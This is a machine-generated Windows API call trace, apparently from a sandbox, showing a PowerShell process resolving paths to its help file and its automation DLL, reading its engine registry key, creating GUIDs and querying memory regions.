	[0411.564] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccf40 | out: lpFileInformation=0xccf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0411.564] SetErrorMode (uMode=0x1) returned 0x1
	[0411.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.565] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd028 | out: phkResult=0xcd028*=0x2fc) returned 0x0
	[0411.565] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfac, lpData=0x0, lpcbData=0xccfa8*=0x0 | out: lpType=0xccfac*=0x1, lpData=0x0, lpcbData=0xccfa8*=0x56) returned 0x0
	[0411.565] CoTaskMemAlloc (cb=0x5a) returned 0x1ffce0
	[0411.565] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccf7c, lpData=0x1ffce0, lpcbData=0xccf78*=0x56 | out: lpType=0xccf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccf78*=0x56) returned 0x0
	[0411.565] CoTaskMemFree (pv=0x1ffce0) 
	[0411.565] RegCloseKey (hKey=0x2fc) returned 0x0
	[0411.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0411.568] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x7f269fcd, Data2=0x6d8b, Data3=0x4548, Data4=([0]=0xb1, [1]=0x2a, [2]=0xa8, [3]=0xed, [4]=0x43, [5]=0x20, [6]=0xa9, [7]=0xae))) returned 0x0
	[0411.568] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xc648cfd3, Data2=0xe9f3, Data3=0x4c99, Data4=([0]=0xb7, [1]=0x20, [2]=0x58, [3]=0x30, [4]=0x5e, [5]=0xd2, [6]=0x1a, [7]=0x9c))) returned 0x0
	[0411.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.890] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x3eef4d4d, Data2=0xf634, Data3=0x4641, Data4=([0]=0x81, [1]=0x6e, [2]=0xc6, [3]=0x3b, [4]=0x7c, [5]=0xb0, [6]=0x8a, [7]=0x53))) returned 0x0
	[0411.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.891] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0411.892] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.193] VirtualQuery (in: lpAddress=0xcb260, lpBuffer=0xcc120, dwLength=0x30 | out: lpBuffer=0xcc120*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.193] VirtualQuery (in: lpAddress=0xcb2f0, lpBuffer=0xcc1b0, dwLength=0x30 | out: lpBuffer=0xcc1b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.195] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.196] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.198] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.198] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcb6a0, lpBuffer=0xcc560, dwLength=0x30 | out: lpBuffer=0xcc560*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.199] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xcdcf11f9, Data2=0x39b4, Data3=0x490c, Data4=([0]=0x8a, [1]=0x46, [2]=0xa0, [3]=0x58, [4]=0x10, [5]=0xf5, [6]=0x7d, [7]=0x35))) returned 0x0
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
